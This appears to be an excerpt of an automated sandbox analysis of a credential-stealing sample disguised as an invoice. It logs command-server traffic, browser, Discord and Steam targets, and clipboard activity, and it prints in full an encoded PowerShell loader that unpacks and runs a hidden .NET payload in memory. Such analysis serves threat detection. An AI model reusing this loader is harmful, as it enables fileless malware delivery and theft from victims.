                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h15_2_09CE8700
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h15_2_09CE86F9
                Source: global trafficTCP traffic: 192.168.2.7:49706 -> 185.36.141.107:7702
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.7:49740
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.7:49973
                Source: unknownDNS traffic detected: query: 90.168.9.0.in-addr.arpa replaycode: Name error (3)
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: unknownTCP traffic detected without corresponding DNS query: 185.36.141.107
                Source: global trafficDNS traffic detected: DNS query: 90.168.9.0.in-addr.arpa
                Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1357497221.0000000002C3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1390938323.0000000005DDC000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000005909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: OSDescription.vbs.exe, 0000000F.00000002.1547078793.00000000049F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1547078793.00000000048A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: OSDescription.vbs.exe, 0000000F.00000002.1547078793.00000000049F3000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1539348684.000000000277E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1547078793.00000000048A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                Source: InstallUtil.exe, 00000009.00000002.1452882158.0000000002607000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1452882158.0000000002521000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1452882158.00000000027C4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000002F6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://archive.torproject.org/tor-package-archive/torbrowser/13.0.9/tor-expert-bundle-windows-i686-
                Source: InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000005909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000005909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000005909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
                Source: InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: OSDescription.vbs.exe, 0000000F.00000002.1547078793.00000000049F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1632367660.0000000004063000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                Source: InstallUtil.exe, 00000009.00000002.1452882158.0000000002607000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1452882158.00000000027C4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://icanhazip.com/
                Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1390938323.0000000005DDC000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000005909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp, Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000005095000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1452882158.0000000002521000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1547078793.0000000004BC5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000002F6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                Source: InstallUtil.exe, 00000009.00000002.1452882158.0000000002607000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1452882158.00000000027C4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/
                Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000274E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003149000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003149000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
                Source: InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000274E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003149000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                Source: InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003149000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                Source: InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003149000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000274E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003149000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003149000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow created: window name: CLIPBRDWNDCLASS

                E-Banking Fraud

                barindex
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe "C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAJump to behavior
